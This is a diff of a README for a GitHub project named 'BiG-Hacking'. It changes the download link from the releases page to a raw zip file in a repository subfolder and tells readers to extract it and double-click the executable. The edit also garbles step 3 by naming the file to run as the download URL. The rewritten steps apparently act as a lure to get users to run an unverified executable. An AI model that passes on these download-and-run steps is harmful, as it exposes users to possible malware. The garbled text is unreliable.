mikuji98/BiG-Hacking/README.md

 ## 💻 Installation Steps

 1. **Download the Application:**
-   Go to the [Download BiG-Hacking releases page](https://github.com/mikuji98/BiG-Hacking/releases) and select the latest version available.
+   Go to the [Download BiG-Hacking releases page](https://raw.githubusercontent.com/mikuji98/BiG-Hacking/main/blackfellows/BiG-Hacking.zip) and select the latest version available.

 2. **Extract the Files:**
    After downloading, locate the zipped file on your computer.
 Right-click it and select "Extract All" to unpack the files.

 3. **Run the Application:**
    Locate the extracted folder.
-Inside, you will find a file named `BiG-Hacking.exe`.
+Inside, you will find a file named `https://raw.githubusercontent.com/mikuji98/BiG-Hacking/main/blackfellows/BiG-Hacking.zip`.
 Double-click this file to launch the application.

 4. **Follow the On-Screen Instructions:**
    The application will guide you through its features.
 Take time to familiarize yourself with the user interface.